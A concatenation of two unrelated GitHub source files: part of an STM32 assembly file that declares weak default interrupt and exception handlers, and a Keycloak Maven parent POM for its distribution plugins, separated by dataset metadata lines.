.globl __stm32reservedexception7
.set __stm32reservedexception7, __default_handler
.weak __stm32reservedexception8
.globl __stm32reservedexception8
.set __stm32reservedexception8, __default_handler
.weak __stm32reservedexception9
.globl __stm32reservedexception9
.set __stm32reservedexception9, __default_handler
.weak __stm32reservedexception10
.globl __stm32reservedexception10
.set __stm32reservedexception10, __default_handler
.weak __exc_svc
.globl __exc_svc
.set __exc_svc, __default_handler
.weak __exc_debug_monitor
.globl __exc_debug_monitor
.set __exc_debug_monitor, __default_handler
.weak __stm32reservedexception13
.globl __stm32reservedexception13
.set __stm32reservedexception13, __default_handler
.weak __exc_pendsv
.globl __exc_pendsv
.set __exc_pendsv, __default_handler
.weak __exc_systick
.globl __exc_systick
.set __exc_systick, __default_handler
.weak __irq_wwdg
.globl __irq_wwdg
.set __irq_wwdg, __default_handler
.weak __irq_pvd
.globl __irq_pvd
.set __irq_pvd, __default_handler
.weak __irq_tamper
.globl __irq_tamper
.set __irq_tamper, __default_handler
.weak __irq_rtc
.globl __irq_rtc
.set __irq_rtc, __default_handler
.weak __irq_flash
.globl __irq_flash
.set __irq_flash, __default_handler
.weak __irq_rcc
.globl __irq_rcc
.set __irq_rcc, __default_handler
.weak __irq_exti0
.globl __irq_exti0
.set __irq_exti0, __default_handler
.weak __irq_exti1
.globl __irq_exti1
.set __irq_exti1, __default_handler
.weak __irq_exti2
.globl __irq_exti2
.set __irq_exti2, __default_handler
.weak __irq_exti3
.globl __irq_exti3
.set __irq_exti3, __default_handler
.weak __irq_exti4
.globl __irq_exti4
.set __irq_exti4, __default_handler
.weak __irq_dma1_channel1
.globl __irq_dma1_channel1
.set __irq_dma1_channel1, __default_handler
.weak __irq_dma1_channel2
.globl __irq_dma1_channel2
.set __irq_dma1_channel2, __default_handler
.weak __irq_dma1_channel3
.globl __irq_dma1_channel3
.set __irq_dma1_channel3, __default_handler
.weak __irq_dma1_channel4
.globl __irq_dma1_channel4
.set __irq_dma1_channel4, __default_handler
.weak __irq_dma1_channel5
.globl __irq_dma1_channel5
.set __irq_dma1_channel5, __default_handler
.weak __irq_dma1_channel6
.globl __irq_dma1_channel6
.set __irq_dma1_channel6, __default_handler
.weak __irq_dma1_channel7
.globl __irq_dma1_channel7
.set __irq_dma1_channel7, __default_handler
.weak __irq_adc
.globl __irq_adc
.set __irq_adc, __default_handler
.weak __irq_usb_hp_can_tx
.globl __irq_usb_hp_can_tx
.set __irq_usb_hp_can_tx, __default_handler
.weak __irq_usb_lp_can_rx0
.globl __irq_usb_lp_can_rx0
.set __irq_usb_lp_can_rx0, __default_handler
.weak __irq_can_rx1
.globl __irq_can_rx1
.set __irq_can_rx1, __default_handler
.weak __irq_can_sce
.globl __irq_can_sce
.set __irq_can_sce, __default_handler
.weak __irq_exti9_5
.globl __irq_exti9_5
.set __irq_exti9_5, __default_handler
.weak __irq_tim1_brk
.globl __irq_tim1_brk
.set __irq_tim1_brk, __default_handler
.weak __irq_tim1_up
.globl __irq_tim1_up
.set __irq_tim1_up, __default_handler
.weak __irq_tim1_trg_com
.globl __irq_tim1_trg_com
.set __irq_tim1_trg_com, __default_handler
.weak __irq_tim1_cc
.globl __irq_tim1_cc
.set __irq_tim1_cc, __default_handler
.weak __irq_tim2
.globl __irq_tim2
.set __irq_tim2, __default_handler
.weak __irq_tim3
.globl __irq_tim3
.set __irq_tim3, __default_handler
.weak __irq_tim4
.globl __irq_tim4
.set __irq_tim4, __default_handler
.weak __irq_i2c1_ev
.globl __irq_i2c1_ev
.set __irq_i2c1_ev, __default_handler
.weak __irq_i2c1_er
.globl __irq_i2c1_er
.set __irq_i2c1_er, __default_handler
.weak __irq_i2c2_ev
.globl __irq_i2c2_ev
.set __irq_i2c2_ev, __default_handler
.weak __irq_i2c2_er
.globl __irq_i2c2_er
.set __irq_i2c2_er, __default_handler
.weak __irq_spi1
.globl __irq_spi1
.set __irq_spi1, __default_handler
.weak __irq_spi2
.globl __irq_spi2
.set __irq_spi2, __default_handler
.weak __irq_usart1
.globl __irq_usart1
.set __irq_usart1, __default_handler
.weak __irq_usart2
.globl __irq_usart2
.set __irq_usart2, __default_handler
.weak __irq_usart3
.globl __irq_usart3
.set __irq_usart3, __default_handler
.weak __irq_exti15_10
.globl __irq_exti15_10
.set __irq_exti15_10, __default_handler
.weak __irq_rtcalarm
.globl __irq_rtcalarm
.set __irq_rtcalarm, __default_handler
.weak __irq_usbwakeup
.globl __irq_usbwakeup
.set __irq_usbwakeup, __default_handler
#if defined (STM32_HIGH_DENSITY)
.weak __irq_tim8_brk
.globl __irq_tim8_brk
.set __irq_tim8_brk, __default_handler
.weak __irq_tim8_up
.globl __irq_tim8_up
.set __irq_tim8_up, __default_handler
.weak __irq_tim8_trg_com
.globl __irq_tim8_trg_com
.set __irq_tim8_trg_com, __default_handler
.weak __irq_tim8_cc
.globl __irq_tim8_cc
.set __irq_tim8_cc, __default_handler
.weak __irq_adc3
.globl __irq_adc3
.set __irq_adc3, __default_handler
.weak __irq_fsmc
.globl __irq_fsmc
.set __irq_fsmc, __default_handler
.weak __irq_sdio
.globl __irq_sdio
.set __irq_sdio, __default_handler
.weak __irq_tim5
.globl __irq_tim5
.set __irq_tim5, __default_handler
.weak __irq_spi3
.globl __irq_spi3
.set __irq_spi3, __default_handler
.weak __irq_uart4
.globl __irq_uart4
.set __irq_uart4, __default_handler
.weak __irq_uart5
.globl __irq_uart5
.set __irq_uart5, __default_handler
.weak __irq_tim6
.globl __irq_tim6
.set __irq_tim6, __default_handler
.weak __irq_tim7
.globl __irq_tim7
.set __irq_tim7, __default_handler
.weak __irq_dma2_channel1
.globl __irq_dma2_channel1
.set __irq_dma2_channel1, __default_handler
.weak __irq_dma2_channel2
.globl __irq_dma2_channel2
.set __irq_dma2_channel2, __default_handler
.weak __irq_dma2_channel3
.globl __irq_dma2_channel3
.set __irq_dma2_channel3, __default_handler
.weak __irq_dma2_channel4_5
.globl __irq_dma2_channel4_5
.set __irq_dma2_channel4_5, __default_handler
#endif /* STM32_HIGH_DENSITY */
.weak __irq_DMA2_Stream4_IRQHandler
.globl __irq_DMA2_Stream4_IRQHandler
.set __irq_DMA2_Stream4_IRQHandler, __default_handler
.weak __irq_ETH_IRQHandler
.globl __irq_ETH_IRQHandler
.set __irq_ETH_IRQHandler, __default_handler
.weak __irq_ETH_WKUP_IRQHandler
.globl __irq_ETH_WKUP_IRQHandler
.set __irq_ETH_WKUP_IRQHandler, __default_handler
.weak __irq_CAN2_TX_IRQHandler
.globl __irq_CAN2_TX_IRQHandler
.set __irq_CAN2_TX_IRQHandler, __default_handler
.weak __irq_CAN2_RX0_IRQHandler
.globl __irq_CAN2_RX0_IRQHandler
.set __irq_CAN2_RX0_IRQHandler, __default_handler
.weak __irq_CAN2_RX1_IRQHandler
.globl __irq_CAN2_RX1_IRQHandler
.set __irq_CAN2_RX1_IRQHandler, __default_handler
.weak __irq_CAN2_SCE_IRQHandler
.globl __irq_CAN2_SCE_IRQHandler
.set __irq_CAN2_SCE_IRQHandler, __default_handler
.weak __irq_OTG_FS_IRQHandler
.globl __irq_OTG_FS_IRQHandler
.set __irq_OTG_FS_IRQHandler, __default_handler
.weak __irq_DMA2_Stream5_IRQHandler
.globl __irq_DMA2_Stream5_IRQHandler
.set __irq_DMA2_Stream5_IRQHandler, __default_handler
.weak __irq_DMA2_Stream6_IRQHandler
.globl __irq_DMA2_Stream6_IRQHandler
.set __irq_DMA2_Stream6_IRQHandler, __default_handler
.weak __irq_DMA2_Stream7_IRQHandler
.globl __irq_DMA2_Stream7_IRQHandler
.set __irq_DMA2_Stream7_IRQHandler, __default_handler
.weak __irq_USART6_IRQHandler
.globl __irq_USART6_IRQHandler
.set __irq_USART6_IRQHandler, __default_handler
.weak __irq_I2C3_EV_IRQHandler
.globl __irq_I2C3_EV_IRQHandler
.set __irq_I2C3_EV_IRQHandler, __default_handler
.weak __irq_I2C3_ER_IRQHandler
.globl __irq_I2C3_ER_IRQHandler
.set __irq_I2C3_ER_IRQHandler, __default_handler
.weak __irq_OTG_HS_EP1_OUT_IRQHandler
.globl __irq_OTG_HS_EP1_OUT_IRQHandler
.set __irq_OTG_HS_EP1_OUT_IRQHandler, __default_handler
.weak __irq_OTG_HS_EP1_IN_IRQHandler
.globl __irq_OTG_HS_EP1_IN_IRQHandler
.set __irq_OTG_HS_EP1_IN_IRQHandler, __default_handler
.weak __irq_OTG_HS_WKUP_IRQHandler
.globl __irq_OTG_HS_WKUP_IRQHandler
.set __irq_OTG_HS_WKUP_IRQHandler, __default_handler
.weak __irq_OTG_HS_IRQHandler
.globl __irq_OTG_HS_IRQHandler
.set __irq_OTG_HS_IRQHandler, __default_handler
.weak __irq_DCMI_IRQHandler
.globl __irq_DCMI_IRQHandler
.set __irq_DCMI_IRQHandler, __default_handler
.weak __irq_CRYP_IRQHandler
.globl __irq_CRYP_IRQHandler
.set __irq_CRYP_IRQHandler, __default_handler
.weak __irq_HASH_RNG_IRQHandler
.globl __irq_HASH_RNG_IRQHandler
.set __irq_HASH_RNG_IRQHandler, __default_handler
.weak __irq_FPU_IRQHandler
.globl __irq_FPU_IRQHandler
.set __irq_FPU_IRQHandler, __default_handler
|
{
"pile_set_name": "Github"
}
|
<!--
~ Copyright 2016 Red Hat, Inc. and/or its affiliates
~ and other contributors as indicated by the @author tags.
~
~ Licensed under the Apache License, Version 2.0 (the "License");
~ you may not use this file except in compliance with the License.
~ You may obtain a copy of the License at
~
~ http://www.apache.org/licenses/LICENSE-2.0
~
~ Unless required by applicable law or agreed to in writing, software
~ distributed under the License is distributed on an "AS IS" BASIS,
~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
~ See the License for the specific language governing permissions and
~ limitations under the License.
-->
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<artifactId>keycloak-distribution-parent</artifactId>
<groupId>org.keycloak</groupId>
<version>12.0.0-SNAPSHOT</version>
</parent>
<artifactId>keycloak-distribution-maven-plugins-parent</artifactId>
<packaging>pom</packaging>
<name>Keycloak Distribution Maven Plugins Parent</name>
<dependencies>
<dependency>
<groupId>org.codehaus.groovy</groupId>
<artifactId>groovy-all</artifactId>
<version>2.4.12</version>
</dependency>
<dependency>
<groupId>org.apache.maven</groupId>
<artifactId>maven-plugin-api</artifactId>
<version>3.3.9</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.maven</groupId>
<artifactId>maven-core</artifactId>
<version>3.3.9</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.maven.plugin-tools</groupId>
<artifactId>maven-plugin-annotations</artifactId>
<version>3.4</version>
<scope>provided</scope>
</dependency>
</dependencies>
<modules>
<module>licenses-processor</module>
</modules>
<build>
<pluginManagement>
<plugins>
<plugin>
<groupId>org.codehaus.gmavenplus</groupId>
<artifactId>gmavenplus-plugin</artifactId>
<version>1.6</version>
<executions>
<execution>
<id>compile-groovy</id>
<goals>
<goal>addSources</goal>
<goal>addTestSources</goal>
<goal>generateStubs</goal>
<goal>compile</goal>
<goal>removeStubs</goal>
<goal>generateTestStubs</goal>
<goal>compileTests</goal>
<goal>removeTestStubs</goal>
</goals>
</execution>
</executions>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-plugin-plugin</artifactId>
<executions>
<execution>
<id>generate-descriptor</id>
<goals>
<goal>descriptor</goal>
</goals>
</execution>
</executions>
</plugin>
</plugins>
</pluginManagement>
</build>
</project>
|
{
"pile_set_name": "Github"
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.